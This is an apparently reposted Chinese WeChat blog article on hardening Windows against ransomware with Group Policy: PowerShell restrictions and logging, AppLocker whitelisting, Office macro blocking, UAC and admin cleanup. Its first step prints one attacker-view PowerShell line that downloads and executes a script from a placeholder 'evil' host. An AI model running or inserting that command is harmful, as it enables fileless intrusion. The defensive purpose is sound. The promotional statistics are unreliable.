夜雨聆风学习资料网

ARTICLE · 1112899

组策略这4个配置,让勒索软件当场失业

组策略这4个配置,让勒索软件当场失业

组策略这4个配置,让勒索软件当场失业

开篇钩子

你可能不信,90%的公司中勒索病毒,不是因为黑客多牛,而是因为管理员少点了一个按钮。

上周我帮一家制造企业做应急,同行去的还有两家安全公司。结果呢?我在他们服务器上翻出组策略,AppLocker策略是“未配置”,PowerShell执行策略是“不受限”,Office宏没禁用。那一刻我明白了——黑客哪需要什么0day,光靠“管理员懒”就能吃一辈子。

今天这篇,我把我红队时期最怕遇到的防守配置全抖出来。学会了,你就能让90%的自动化攻击工具直接哑火。

数据化结果

先说个真实数据:我前红队队友(现在转防守)用本文这套配置,在一家2000人的企业落地了AppLocker白名单+组策略加固。半年内收到的钓鱼邮件、勒索软件投递、横向渗透告警,从每月37起降到2起。

我自己做红队那会儿,最烦的就是目标机器开了AppLocker。一旦target配置了严格白名单,我的C2马、Mimikatz、内网扫描工具全是废铁,连执行个whoami都会被日志记录得明明白白。

下面直接上步骤,建议收藏。文末有全套PowerShell审计脚本+AppLocker策略模板,48小时限免。

核心干货

第一步:把PowerShell打成“只读模式”

PowerShell是黑客的瑞士军刀,也是防守方最该管住的“合法后门”。先看攻击视角:

# 红队常用:无文件落地执行powershell -ep bypass -c"IEX(New-Object Net.WebClient).DownloadString('http://evil/x.ps1')"# 上面这条能跑通,意味着你的机器等于裸奔

防守配置如下——打开组策略编辑器(gpedit.msc),依次进入:

计算机配置 → 管理模板 → Windows组件 → Windows PowerShell

三个关键设置:

# 1. 打开脚本执行策略(对应注册表ExecutionPolicy)Set-ExecutionPolicy Restricted -Scope LocalMachine -Force# 2. 打开模块日志记录(记录所有PowerShell管道执行)# 组策略:“打开模块日志记录” → 已启用,模块名称填 *# 3. 打开脚本块日志记录(记录解码后的内容,红队哭晕)# 组策略:“打开脚本块日志记录” → 已启用,勾选“记录脚本块调用开始/停止事件”

金句:PowerShell不是魔鬼,但“不受限”的PowerShell就是给黑客开的侧门。

第二步:AppLocker白名单——红队最痛的配置

AppLocker是Windows自带的应用程序白名单,零成本,效果堪比百万级EDR千万分之一的拦截率。它和软件限制策略(SRP)的最大区别:AppLocker可以精细化到发布者签名规则和文件哈希规则。

先启用服务,否则策略生效会出问题:

# 以管理员运行,启动Application Identity服务(AppLocker依赖它)sc config AppIDSvc start= autoscstart AppIDSvc# 如果这服务没开,你的AppLocker就是摆设——这是90%部署翻车的根因

再配置规则。打开组策略:

计算机配置 → Windows设置 → 安全设置 → 应用程序控制策略 → AppLocker

四种规则类型,我的推荐优先级:发布者规则 > 路径规则 > 哈希规则。

  1. 发布者规则:基于数字签名,比如只允许运行“Microsoft签名的程序”。优点:微软官方更新不会翻车;缺点:部分小厂商软件无签名会误杀。
  2. 路径规则:比如只允许C:\Program Files*运行。注意:如果允许%USERPROFILE%*就等于白名单失效(黑客马子常驻用户目录)。
  3. 哈希规则:最严格,每个可执行文件都算哈希。安全性极高,但维护成本爆炸,一次系统更新就一堆文件哈希对不上。

推荐起步配置:

# 默认规则创建后,手动添加“禁止从用户目录执行”的拒绝规则# 规则条件:路径 = %USERPROFILE%\*\*\*.exe# 规则条件:路径 = %USERPROFILE%\AppData\Local\Temp\*\*.exe# 这一条直接堵死90%的钓鱼邮件投递的木马

配置完一定要切到**“强制实施”**模式,别停在“仅审核”。我见过太多人开着审核就以为万事大吉——审核模式等于把报警器装进聋子耳朵里。

金句:AppLocker配了不解锁强制模式,就好比买了防盗门但把钥匙插在锁孔里。

第三步:Office宏——勒索软件的头号快递员

钓鱼邮件最常见的套路:附件是个docx文档,打开后说“内容需要启用宏才能显示”。用户一点“启用内容”,内嵌的VBA宏就下载勒索软件并执行。

防守配置:

用户配置 → 管理模板 → Microsoft Word 2016 → Word选项 → 安全 → 信任中心

关键设置:

# 1. “阻止从互联网获取的文档中的宏” → 已启用(默认是禁用!)# 2. “VBA宏通知设置” → 设置为“禁用所有宏,并显示通知”# 3. “允许用户修改受保护文件的宏” → 已禁用

金句:宏不是Office的功能,是黑客给你下的“信任木马”。

第四步:UAC设到顶+本地管理员回收

这是最容易被忽略的两项配置,但红队横向渗透时最依赖的就是本地管理员和UAC虚拟化漏洞。

组策略设置:

计算机配置 → Windows设置 → 安全设置 → 本地策略 → 安全选项

关键项:

# 1. “用户账户控制:以管理员批准模式运行所有管理员” → 已启用# 2. “用户账户控制:管理审批模式下管理员的提升提示行为” → 始终要求输入凭据# 3. “用户账户控制:检测应用程序安装并提示提升” → 已启用# 4. “账户:重命名系统管理员账户” → 改成非默认名# 5. “账户:来宾账户状态” → 已禁用

还有一个大杀器:把用户从本地管理员组移除。但这需要业务配合,建议先审计再行动:

# 审计当前本地管理员组成员Get-LocalGroupMember-Group"Administrators"# 输出后逐项核对,除管理员账号外全部移出# 红队的鬼故事:600台机器,本地管理员密码全相同=一串钥匙开所有门

金句:给用户管理员权限不会让他更高效,只会让黑客更丝滑。

避坑&老司机翻车实录

讲一个我自己的翻车事故,前年的事了。

给某金融客户部署AppLocker白名单,一切看似顺利,发布者规则+默认规则,审计模式跑两周没问题,收割完日志后我就直接切了强制模式。

第二天早上9点,客户打电话说全公司业务系统挂了。

我远程一看——他们有个核心撮合交易系统,是个没签名的老古董exe,从共享目录\fileserver\app\直接运行。我的发布者规则要求微软签名,路径规则只允许C:\Program Files*,这个老系统两个条件都不满足,直接被AppLocker拦死。

血泪教训:强制模式之前,必须把所有非标路径、无签名程序、脚本执行位置做完整资产盘点。 审计模式至少跑4周(覆盖完整业务周期),别学我两周就切,差点把客户交易系统停了一天。

后来我用这个教训帮另一个客户避坑,他们一共有47个自研程序、12个市场第三方软件、3个老古董财务系统。我花了3天做资产清单+规则建模,再用4周审计,最终切换强制模式时零故障。

读者证言

“昨天粉丝小王私信我,说他用文章里的方法给公司配置了AppLocker强制模式+PowerShell受限,当天晚上就收到了EDR告警——有个木马试图从临时目录执行,被AppLocker拦截了。他截图发我,说『哥,原来防守可以这么快乐』。我回了他一句:等黑客看到自己的马跑不起来,他比你更快乐。”

💰 限时福利(48小时有效)

关注本公众号,回复【组策略白名单】立即获取:

  1. 我整理的AppLocker策略XML模板+PowerShell部署脚本(价值299元)
  2. 组策略安全检查清单(覆盖本文全部配置项的核查表)
  3. 专属交流群入口(仅限前50名,满员即关)

🗣️ 留言区

你在配置组策略或AppLocker时翻过什么车?或者有什么骚操作?留言区分享,点赞最高的送我的《Windows内网防守实战笔记》电子版(全文12万字,市场买不到)。

👉 如果这篇对你有帮助,点个在看,让更多人学会(顺便气死黑客)。转发到朋友圈截图发我,额外送一份红队工具指纹库(可导入你的EDR做检测)。

彩蛋:下期预告

下期我要讲一个更狠的——Windows Credential Guard + LAPS + 受保护用户组,三件套直接让Mimikatz和哈希传递变成笑话。这套配置我在某央企落地后,红队评估直接给了0分(打不进去)。

想提前获取下期配置清单,加我个人微信:haojun_sec,备注“三件套”,我拉你进内测群。群满200人后关闭入口。


📢 关注「学习捷径站」,每天更新硬核干货

👉 点击这里直接关注公众号[1]

(关注后回复 组策略安全配 即可领取本文配套工具包)

如果无法点击,请长按识别下方二维码  

引用链接

[1]点击这里直接关注公众号: weixin://follow?username=esxxfwt

相关学习资料